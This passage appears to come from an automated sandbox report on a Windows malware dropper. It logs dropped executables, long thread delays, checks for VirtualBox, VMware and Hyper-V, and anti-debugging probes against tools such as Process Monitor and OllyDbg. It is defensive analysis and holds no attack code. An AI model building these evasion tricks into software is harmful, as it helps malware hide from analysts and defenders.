                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeWindow / User API: threadDelayed 5926
                    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 474
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2978
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 1150
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 1025
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 1110
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 1048
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 968
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeWindow / User API: threadDelayed 1075
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1359
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3410
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018906001\003.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\UKzjyWlrjRLOjKNNlNHI.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018905001\92133eb3c2.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4000Thread sleep count: 876 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4000Thread sleep time: -1752876s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5332Thread sleep count: 863 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5332Thread sleep time: -1726863s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1512Thread sleep count: 194 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1512Thread sleep time: -5820000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5820Thread sleep count: 864 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5820Thread sleep time: -1728864s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2532Thread sleep count: 2736 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2532Thread sleep time: -5474736s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616Thread sleep count: 886 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616Thread sleep time: -1772886s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5024Thread sleep count: 876 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5024Thread sleep time: -1752876s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5040Thread sleep count: 901 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5040Thread sleep time: -1802901s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 5608Thread sleep time: -56028s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 4988Thread sleep time: -58029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 6260Thread sleep time: -60030s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe TID: 5748Thread sleep time: -62031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 6520Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 8096Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe TID: 8096Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599873s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599764s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599641s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599519s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599391s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599266s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599141s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -598889s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -598780s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -598594s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -598422s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -598230s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -597969s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -597578s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -597391s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -597219s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -597108s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596996s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596763s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596625s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596468s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596358s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596203s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -596088s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -595984s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe TID: 948Thread sleep time: -595872s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 3328Thread sleep time: -2301150s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 1584Thread sleep time: -2051025s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 712Thread sleep time: -2221110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 6208Thread sleep time: -52000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 3488Thread sleep time: -2097048s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 4552Thread sleep time: -1936968s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe TID: 1780Thread sleep time: -2151075s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep count: 1359 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep count: 3410 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe TID: 2832Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599873
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599764
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599641
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599519
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599391
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599266
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599141
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598889
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598594
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598422
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 598230
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597969
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597391
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 597108
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596996
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596763
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596625
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596358
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596203
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 596088
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 595984
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeThread delayed: delay time: 595872
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                    Source: skotes.exe, skotes.exe, 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmp, 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: 0064eff6c8.exe, 00000012.00000003.3063504624.00000000006A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1
                    Source: 950932ab59.exe, 00000034.00000002.3514958295.000000000151E000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                    Source: file.exe, 00000001.00000003.2169365759.0000000001770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vmware
                    Source: 950932ab59.exe, 00000034.00000002.3512326183.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0+R
                    Source: skotes.exe, 00000009.00000002.4662164077.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3514958295.000000000151E000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000001.00000003.2169365759.0000000001770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: file.exe, 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmp, 950932ab59.exe, 00000034.00000002.3506198317.0000000000CA3000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: RzAAR0y.exe, 0000000B.00000002.4666221685.000001AC38F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                    Source: vQeyqr1.exe, 0000000E.00000002.4744725206.000000001BE60000.00000004.00000020.00020000.00000000.sdmp, 22b0b7688f.exe, 00000018.00000003.3268751727.0000000001E76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: PING.EXE, 0000002E.00000002.3365474903.0000020749D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeProcess queried: DebugPort
